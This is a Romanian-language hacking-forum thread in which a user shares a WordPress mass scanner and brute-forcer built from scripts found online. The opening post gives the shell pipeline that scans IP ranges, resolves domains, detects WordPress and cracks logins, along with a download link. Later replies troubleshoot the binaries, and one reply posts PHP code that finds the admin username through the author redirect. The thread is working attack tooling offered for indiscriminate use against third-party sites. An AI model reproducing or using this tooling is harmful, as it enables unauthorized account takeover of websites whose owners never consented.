Linux WordPress scanner + Bruteforcer

[sebywarlord]

Acum cateva zile mi-am facut un scanner de wordpress.Ok nu am codat eu nici 1% din el,doar am luat niste scripturi de pe net si le-am unit .

Mersi lui @Elohim pentru script-ul de path disclosure

Scannerul lucreaza in 4 parti

1.Cauta ip-uri cu portul 80 deschis

2.Gaseste toate domeniile hostate pe acele ip-uri

3.Alege url-urile care au wordpress instalat

4.Face bruteforce.

Cum se foloseste ?

./start A [ex ./start 80]

echo "Starting to collect ips"

#This part is for collecting ips on port 80

./ss 80 -i eth0 -s 8 -a $1

#This part is for getting urls from ips

echo "Starting to transform ips to domains"

./getdns bios.txt

#This part is for checking if the domains have wordpress installed

echo "Starting to find domains with wordpress installed"

cat url.txt | sort | uniq > hosts.txt

python findwp.py 500

#This part is for cracking the wp-s

echo " Starting to bruteforce"

./brute -i wpuri.txt -c 250

Download : http://www.mediafire.com/download/jrexbn16132y7bc/wp.zip

Daca aveti intrebari,reply aici!

PS: Daca va place, dati si voi un like, un mersi,nu ca la scannerul ala de RDP care l-am postat (500 downloads si niciun merci. )

Edited March 12, 2014 by sebywarlord

[Elohim]

Dragut. La ce script ai apelat pentru brute force?

[BloodLust]

am o problema

root@localhost:/var/tmp/wp# ./brute

bash: ./brute: No such file or directory

e singurul fiser care nu imi merge ce sai fac ?

[sebywarlord]

@BloodLust

Probabil ai sistemul de operare pe 64 biti,iar fisierul de brute e compilat pentru x86

Incearca :

yum install glibc.i686

[BloodLust]

ok mersi mult

[Htich]

[root@localhost Python-2.7.6]# unzip wp.zip

Archive: wp.zip

inflating: 35934-762-sniper-rifle-dragunov-svd-s.exe

---

Houston we have a problem !

Poti urca pe alt host scanu ?

Edited March 12, 2014 by Htich

[sebywarlord]

@Htich

wp

Updated si in primul post

Edit:

Ce sloboz?

35934-762-sniper-rifle-dragunov-svd-s.exe

girlshare de cacat in plm,cum sa-ti modifice arhiva?

Edited March 12, 2014 by sebywarlord

[Htich]

Multumsc pt re-upload.

Nu stiu poate mai baga cineva din "admini" ceva .exe sa "mai faca si ei rost de un honeypot"

[intrus]

Unii modifica userul admin.. so..

$url = $host.'/?author=1';

$c = curl_init($url);

curl_setopt($c, CURLOPT_RETURNTRANSFER, true);

curl_setopt($c, CURLOPT_NOBODY,true);

curl_setopt($c, CURLOPT_HEADER, true);

$result = @curl_exec($c);

curl_close($c);

preg_match("/Location: (.*)/",$result,$m);

$sparge = explode("/", $m[1]);

$user = trim($sparge[4]);

if ($user == "") {

$user = "admin";

}

Edited March 14, 2014 by intrus

[l3tmeb3]

La getdns ramane "blocat" .

Cate linii suporta fisierul la care sa faca dns ?

[sebywarlord]

Nu are limita.

Nu ramane blocat numai ca nu arata output , le pune direct in url.txt